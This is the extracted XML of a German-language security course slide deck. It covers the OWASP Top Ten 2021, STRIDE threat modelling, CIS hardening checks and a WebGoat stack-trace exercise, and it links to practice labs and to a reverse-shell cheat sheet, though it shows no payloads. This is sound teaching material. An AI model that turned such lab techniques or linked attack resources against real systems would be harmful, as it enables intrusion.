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256" r:id="rId5"/>
    <p:sldId id="298" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="410" r:id="rId8"/>
    <p:sldId id="409" r:id="rId9"/>
    <p:sldId id="411" r:id="rId10"/>
    <p:sldId id="422" r:id="rId11"/>
    <p:sldId id="412" r:id="rId12"/>
    <p:sldId id="391" r:id="rId13"/>
    <p:sldId id="415" r:id="rId14"/>
    <p:sldId id="416" r:id="rId15"/>
    <p:sldId id="414" r:id="rId16"/>
    <p:sldId id="417" r:id="rId17"/>
    <p:sldId id="418" r:id="rId18"/>
    <p:sldId id="413" r:id="rId19"/>
    <p:sldId id="297" r:id="rId20"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6797675" cy="98742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34" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="8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rotea Böhm" initials="DB" lastIdx="3" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S::dorotea.boehm@siw.swiss::7801c4e6-7c1c-49ef-ac6c-f61a3d331c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5EAB"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="00B96F"/>
    <a:srgbClr val="DFDDDD"/>
    <a:srgbClr val="EFEDED"/>
    <a:srgbClr val="E9E7E7"/>
    <a:srgbClr val="00F290"/>
    <a:srgbClr val="007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2118" y="132"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1434"/>
        <p:guide pos="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media/image1.png>
</file>

<file path=ppt/media/image10.jp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CBB07-6B3B-455F-A3E1-B0EC6984990C}" type="datetimeFigureOut">
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>07.03.2022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8775" cy="38893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DB75E-D8E2-43F8-8ADA-CFDCAD597B9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2819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01228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gehen OWASP Top Ten 2021 Thema für Thema durch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547725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gehen OWASP Top Ten 2021 Thema für Thema durch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3671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5897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9793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2744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60116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6011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gehen OWASP Top Ten 2021 Thema für Thema durch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9812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gehen OWASP Top Ten 2021 Thema für Thema durch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96292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gehen OWASP Top Ten 2021 Thema für Thema durch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6569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gehen OWASP Top Ten 2021 Thema für Thema durch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83943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4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="900000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CH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6376" y="304728"/>
            <a:ext cx="11547130" cy="589812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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6375" y="1050932"/>
            <a:ext cx="11547130" cy="51195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47235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80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4911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9942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8C4F4CE-3B5C-4611-AA64-FE58FACD6D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8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119A4B1-9A24-4463-B637-6105CF1DF0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0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F7416F6-1932-422B-99E1-BCA03695BA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6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3200"/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800"/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400"/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B4DF240-4E55-4A5A-9DF7-04E86B3675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6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4DE612-7CBE-4020-B94E-DD9DC7C5CB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8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502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§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STRIDE_(security)" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A04_2021-Insecure_Design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hyperlink" Target="https://en.wikipedia.org/wiki/STRIDE_(security)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wasp.org/Top10/A04_2021-Insecure_Design/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/security/develop/threat-modeling-tool-getting-started" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aka.ms/threatmodelingtoo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wasp.org/Top10/A05_2021-Security_Misconfiguration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wasp.org/Top10/A05_2021-Security_Misconfiguration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wasp.org/Top10/A05_2021-Security_Misconfiguration/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:7080/WebGoat/start.mvc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ryhackme.com/room/owasptop10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hyperlink" Target="https://owasp.org/Top10/A03_2021-Injectio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ybercops-ip:7070/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:7070/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/digininja/DVWA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wasp.org/Top10/A03_2021-Injection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hyperlink" Target="https://owasp.org/Top10/A03_2021-Injection/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.m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wasp.org/Top10/A03_2021-Injection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wasp.org/Top10/A03_2021-Injection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wasp.org/Top10/A04_2021-Insecure_Desig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8CAAA-2971-4E84-B7D1-DCA4F78E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971" y="5132306"/>
            <a:ext cx="10584000" cy="589812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="3600" b="1"/>
              <a:t>Fachkürzel - Fach ausgeschrieben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F3D0A9-6CAA-438A-AAC3-D590FF7D3AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="0"/>
            <a:ext cx="946800" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A5E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3600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Fach ACCE</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2" descr="Lernen, Bildung, Bücher, Buch, Bibliothek, Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB97E2A-EAFC-4C05-A9E8-8D633891C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049" y="1815960"/>
            <a:ext cx="5685453" cy="37490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A5A5A5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5B27B77-9346-4F17-85B9-C76CA10E3A72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="942000" y="920064"/>
            <a:ext cx="11250000" cy="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A02E449B-9A48-482D-AEEE-E73896E1A402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16601" y="0"/>
            <a:ext cx="0" cy="686520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02B8D765-6CFF-4551-B091-13F2626B7A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249715" y="124662"/>
            <a:ext cx="1048194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de-DE" sz="3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Block 12 vom 8.3.2022</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="36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2AB8E98-FE52-4FD5-B055-C5E5A01D09E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1453101" y="1734174"/>
            <a:ext cx="4024956" cy="4024956"/>
            <a:chOff x="5900049" y="2060165"/>
            <a:chExt cx="4024956" cy="4024956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9F4C921-D825-489B-B005-1327C192B5CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5900049" y="2060165"/>
              <a:ext cx="4024956" cy="4024956"/>
              <a:chOff x="5900049" y="2060165"/>
              <a:chExt cx="4024956" cy="4024956"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="Grafik 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A000696F-EFE0-4909-8CAC-942F5E3967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00049" y="2060165"/>
                <a:ext cx="4024956" cy="4024956"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Ellipse 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FA6A04-ACCC-4560-9A22-7EDFD6243ED4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7227142" y="3313470"/>
                <a:ext cx="1351106" cy="145952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53D86191-68B4-45CB-89C6-7C40E724B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51738" y="3755234"/>
              <a:ext cx="1341602" cy="57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4359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A04:2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Design [1]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OWASP Top Ten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0" y="1585529"/>
            <a:ext cx="10488003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STRIDE [2] als Klassifizierung für Bedrohungen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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A5EAB"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>S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poofing: Sich für jemand anderem ausgeben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Angriff auf die Authentizität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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A5EAB"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>T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ampering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Daten manipulieren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Angriff auf die Integrität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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A5EAB"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>R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epudiation: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Abstreitbarkeit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(Das war nicht ich, das war sonst jemand)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Angriff auf Vertrauenswürdigkeit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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A5EAB"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>I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nformation Disclosure: Datendiebstahl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Angriff auf die Vertraulichkeit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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A5EAB"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>D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enial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of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service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Den Service ausser Betrieb nehmen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Angriff auf die Verfügbarkeit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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A5EAB"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E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levation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of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Privileges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Höhere Rechte erlangen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Angriff auf die Autorisierung</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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BD6676C-197F-4E99-8E61-EA4F50203B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="70471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4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A04_2021-Insecure_Design/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0"/>
              <a:t> [2] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/STRIDE_(security)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="12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21733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A04:2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Design [1]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OWASP Top Ten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0" y="1585529"/>
            <a:ext cx="10488003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Aufgabe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Microsoft Thread Modelling Tool installieren: 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https://aka.ms/threatmodelingtool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Einen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WebServer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mit Datenbank zeichnen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Anleitung: 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5"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/azure/security/develop/threat-modeling-tool-getting-started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“Building a Model”, “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Analyzing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threats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” bearbeiten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Fragen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Was fällt euch auf wenn ihr die einzelnen Analyse Punkte durchgeht?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Weiterer Prozess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Beschreiben / Bewerten der Punkte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Reporting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Hausaufgabe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Verändern des Diagramms und Auswirkungen auf die Bedrohungen beobachten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BD6676C-197F-4E99-8E61-EA4F50203B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="70471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6"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A04_2021-Insecure_Design/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0"/>
              <a:t> [2] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/STRIDE_(security)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="12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379633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A05:2021 Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1]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OWASP Top Ten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0" y="1585529"/>
            <a:ext cx="1048800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Richtet sich gegen Konfigurationsfehler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Mögliche Probleme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Kein “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Hardening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”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Unnötig offene Ports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Unnötig installierte Module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Default Passwörter (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Shodan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…)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Fehlerbehandlung verrät zu viel über das System (Stack Trace wegen nicht abgefangenem Fehler)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Fehlende sicherheitsrelevante HTTP-Header (Scanner Tools)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Wie kann das verhindert werden?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BD6676C-197F-4E99-8E61-EA4F50203B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="4396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4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A05_2021-Security_Misconfiguration/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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06900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A05:2021 Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1]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OWASP Top Ten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0" y="1585529"/>
            <a:ext cx="104880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CIS Benchmark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Sämtliche wichtige OS abgedeckt (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Siehe Block11 Ordner für eine Auswahl)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Sehr umfangreiche Checkliste um Server sicher zu machen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Aufgabe CIS Benchmark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Siehe Block11/CIS_Distribution_Independent_Linux_Benchmark_v2.0.0.pdf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Führe auf der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 die Prüfung gemäss Kapitel 6.1.2 und 6.1.4 durch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Ist alles in Ordnung?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Warum ist das wichtig? </a:t>
            </a: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Was kann passieren, wenn das nicht eingehalten wird?</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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BD6676C-197F-4E99-8E61-EA4F50203B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="4396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4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A05_2021-Security_Misconfiguration/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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20538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A05:2021 Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1]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OWASP Top Ten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0" y="1585529"/>
            <a:ext cx="104880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Fehlerbehandlung unvollständig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Interne Fehler müssen abgefangen werden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«Nichtssagende» Fehlermeldung anzeigen (allenfalls mit ID für den Support)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Nicht abgefangene Fehler erzeugen einen Stack-Trace und verraten zu viel über das System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Aufgabe Stack-Trace (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Webgoat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Rufe folgende URL auf: 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http://localhost:7080/WebGoat//start.mvc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Das doppelte // vor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start.mvc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kann von der Applikation nicht verarbeitet werden und erzeugt einen Stack-Trace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Lies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den Stack-Trace aufmerksam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Was für Informationen über die Applikation findest Du?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Wie kann man das verhindern?</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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BD6676C-197F-4E99-8E61-EA4F50203B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="4396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5"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A05_2021-Security_Misconfiguration/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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16543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CH" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aufgaben</a:t>
            </a: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6" y="2955396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Aufgaben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88DA146E-88D6-4881-AF6A-C09125F53767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635169" y="1585529"/>
            <a:ext cx="98601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OWASP Top Ten selbstständig und nach Interesse vertiefen.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Dazu steht zur Verfügung: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WebGoat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DVWA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TryHackMe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https://tryhackme.com/room/owasptop10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Google / eigene Quellen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17592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5A82BDA3-EABB-407C-BFD8-231581B4203C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308062" y="388375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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACCE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Block 13</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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ECCC17A-778C-4653-8B72-D0A515510282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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Ausblick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849ABAF-515D-4FD5-8F69-BF796B7B9B54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022F0CE8-9B1E-4FC1-ACD8-CE454C7E1BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1299830" y="395440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E081B6EB-677D-457D-9E69-D8A0DC9A1E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738052" y="3429000"/>
            <a:ext cx="2980597" cy="3056126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1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="1A5EAB"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A5EAB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Lernziele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Angriffe auf Webapplikationen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B04572A2-D897-4DE2-8C56-4C81677F4E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738053" y="2090253"/>
            <a:ext cx="2980596" cy="1338747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A5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42561EB0-CC3A-4724-A320-1EAB1F1FE3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629380" y="1570731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1A5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8E08E895-80AB-40DD-982A-BB06D06263DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347593" y="2780990"/>
            <a:ext cx="1781578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Organisation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6CCEC4B4-A541-484D-9CD8-EB135D9447CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144897" y="3406432"/>
            <a:ext cx="2980597" cy="3056127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96F"/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Angriffsarten auf Webapplikationen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OWASP Top Ten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Die restlichen 4 der Rangliste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03BC52D4-7E5B-4BFE-ACCE-9568039E1CF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144898" y="2067687"/>
            <a:ext cx="2980596" cy="1338747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67E91BF9-4DDC-46B4-9F9F-FC62C06117D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6036225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00B9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5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90D6FE3B-FA6D-4E84-8D30-4FB8B489F484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6107635" y="2747288"/>
            <a:ext cx="1051890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8B644903-85A6-4D05-AA46-ECE7F98C4286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8507233" y="3406432"/>
            <a:ext cx="2980597" cy="3056128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de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="95000"/>
                </a:schemeClr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Einfache Angriffe auf Webapplikationen selber durchführen</a:t>
            </a:r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B1AD92FF-2A95-4189-825F-35A4C42251A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8507234" y="2067687"/>
            <a:ext cx="2980596" cy="13387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16DABE13-68F5-475E-AE60-5F9F31EF12CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9398561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C200367A-8889-4CC1-A810-4690E5253883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9481620" y="2780990"/>
            <a:ext cx="1051891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pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Grafik 24" descr="Buddha-Silhouette">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F92DFF5F-F6E8-46FD-8F17-5FD5D0733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10135" y="1734186"/>
            <a:ext cx="774792" cy="774792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Grafik 26" descr="gezeichnete Figur">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFF16E1-473B-40DE-913C-D4EEE73A7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88015" y="1763226"/>
            <a:ext cx="761747" cy="761747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A76BBC20-E52F-40B8-9EB7-72EE5BDD1561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5978282" y="1802021"/>
            <a:ext cx="77457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600">
                <a:solidFill>
                  <a:srgbClr val="00B96F"/>
                </a:solidFill>
                <a:sym typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4600">
              <a:solidFill>
                <a:srgbClr val="00B96F"/>
              </a:solidFill>
              <a:latin typeface="Lato Light" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Grafik 23" descr="Präsentation mit Organigramm">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263BCDAC-2599-40C2-8F34-4A9BCD2602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80482" y="1749106"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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6D1AD115-BE01-4D3E-9AD7-BFF36774467F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EC8CED6-016E-44F4-9B3F-112712A80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DEFB9B3E-547F-4588-9324-6DB68315F60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4948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ACHTUNG Aufnahme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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Aufnahme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B8A1507C-AF08-4D3B-9127-6BE2975D2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450" t="43033" r="7501" b="54937"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536571" y="2754341"/>
            <a:ext cx="3848810" cy="57646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A4AACE6-F439-41A6-82B7-83E142F7F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571" y="4867261"/>
            <a:ext cx="3848810" cy="103997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2D783D4-43C3-44E8-B6A7-F35A98CDAF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19"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512540" y="2754341"/>
            <a:ext cx="3958743" cy="315289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FDF1E7A-0A49-4C17-9497-6C8179E5EC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512540" y="1610833"/>
            <a:ext cx="9872841" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill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«Guten Abend, ich starte jetzt die Aufzeichnung …»</a:t>
            </a:r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D01753AB-1B53-459A-9858-F154B590012D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
